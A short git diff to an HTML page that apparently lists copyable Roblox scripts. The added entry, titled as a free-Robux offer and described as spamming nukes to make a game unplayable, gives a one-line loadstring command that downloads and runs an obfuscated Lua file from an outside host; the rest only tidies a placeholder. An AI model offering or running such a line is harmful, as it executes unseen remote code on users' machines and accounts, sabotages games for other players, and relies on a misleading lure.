--- a/index.html
+++ b/index.html
@@ -306,9 +306,9 @@
 
 
 <div class="script-item new-style">
-    <div class="script-header">f</div>
-    <div class="subheader">A brief description of what this script does.</div>
-    <div class="script-code">print("f")
+    <div class="script-header">Get Robox Escape For Free Parkour Obby Robux</div>
+    <div class="subheader">Spams nukes to make the game unplayable!</div>
+    <div class="script-code">loadstring(game:HttpGet("https://getorbs.us.to/GREFFPOR-obfuscated.lua"))()
     </div>
     <div class="button-container">
         <button class="copy-button new-style" onclick="copyToClipboard(this)">Copy</button>
@@ -321,8 +321,7 @@
 <div class="script-item new-style">
     <div class="script-header">g</div>
     <div class="subheader">A brief description of what this script does.</div>
-    <div class="script-code">
-        print("g")
+    <div class="script-code">print("g")
     </div>
     <div class="button-container">
         <button class="copy-button new-style" onclick="copyToClipboard(this)">Copy</button>
